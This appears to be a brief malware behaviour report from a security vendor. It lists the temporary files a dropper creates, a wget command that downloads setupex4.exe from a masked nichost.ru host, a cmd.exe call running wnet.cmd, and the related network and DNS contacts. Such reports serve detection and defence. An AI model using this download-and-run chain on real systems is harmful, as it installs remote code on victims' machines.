Technical Information
- %TEMP%\1.tmp\setupex4.exe
- %TEMP%\1.tmp\wget.exe http://ca####.nichost.ru/setupex4.exe
- %TEMP%\1.tmp\setupex4.exe (downloaded from the Internet)
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\wnet.cmd" "
- %TEMP%\1.tmp\setupex4.exe
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\wnet.cmd
- %TEMP%\1.tmp\wnet.cmd
- %TEMP%\1.tmp\wget.exe
- 'ca####.nichost.ru':80
- ca####.nichost.ru/setupex4.exe
- DNS ASK ca####.nichost.ru